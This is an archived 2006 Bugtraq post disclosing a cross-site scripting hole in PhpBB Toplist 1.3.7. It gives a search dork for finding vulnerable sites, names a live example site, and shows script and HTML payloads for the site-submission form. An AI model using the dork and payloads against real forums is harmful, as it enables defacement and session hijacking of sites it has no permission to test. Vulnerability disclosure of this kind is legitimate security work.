[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
PhpBB Toplist 1.3.7 Xss Vuln.
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: PhpBB Toplist 1.3.7 Xss Vuln.
- From: starext@xxxxxxx
- Date: 8 Dec 2006 16:57:57 -0000
# LiderHack.Org
# script name : PhpBB Toplist 1.3.7
#Dork : toplist.php?f=toplistnew
# Risk : High
# Found By : St@rExT
# Vulnerable file : Toplist.php
# New add sites addres: toplist.php?f=toplistnew
#Name: [xss code]
&
#Information: [xss code]
&
#Name: <h1>Your name</h1>
&
#Name: <script>alert("yourmessage")</script>
#example sites : http://www.nfl-forum.net/toplist.php
Submit
# Thanks : Dekolax , ShaFuck31 , ST@ReXT , Dekolax , Swat_Hack , Maverick ,
Candark , Torlaq , Woheras , Siruas
# E-mail: Starext[at]msn[dot]com
##################### --Türküm -- ####################